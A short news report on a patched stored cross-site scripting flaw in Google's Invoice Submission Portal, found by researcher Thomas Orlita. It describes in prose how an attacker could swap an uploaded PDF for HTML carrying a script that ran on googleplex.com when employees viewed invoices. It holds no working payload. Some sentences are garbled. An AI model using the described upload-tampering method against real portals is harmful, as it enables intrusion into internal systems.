This attack vector was discovered in February this year by security researcher Thomas Orlita and was patched in mid-April, but now only publicly available.
XSS IN GOOGLE’s INVOICING PORTAL
The security fault is impacted by the Google Invoice Submission Portal, a public website on which Google redirects business partners to provide the contractual agreement based invoices.
Described as a vulnerability to cross-site scripting (XSS).
Most XSS flaws are considered benign, but rare cases may lead to serious consequences for these kinds of vulnerabilities. One of those cases was the discovery of Orlita. The researcher said a malicious actor could upload malformed files via the Upload Invoice field on the Google Invoice Submission Portal. Using a proxy, the attacker could have intercepted and modified the documents from PDF to HTML, to XSS maliciously payload immediately after the form submission and validation operation took place. The data would end up being stored in the billing backend of Google and would automatically be executed when an employee tried to view it. “Since XSS was run on a subdomain Googleplex.com while employees are logged in, an attacker should be in a position to access the Dashboard in the subdomain where the invoices can be viewed and managed,” Orlita said to ZDNet by email. Any other internal applications on this domain may be accessible, depending on whether cookies are configured on googleplex.com,’ added the investigator. As most internal Google applications are hosted on GooglePlex.com, this opens the door to a wide range of possibilities for attackers. In all things, however, this bug, as with most XSS security bugs, would have depended on the ability of a threat-actor to pivot more complex attacks. “The seriousness of the impact depends, of course, on how well it can be used to access its internal sites,” “For example, an attacker could try to attack an employee phishing.” The official Orlita vulnerability disclosure is the place for more technical details about the XSS bug.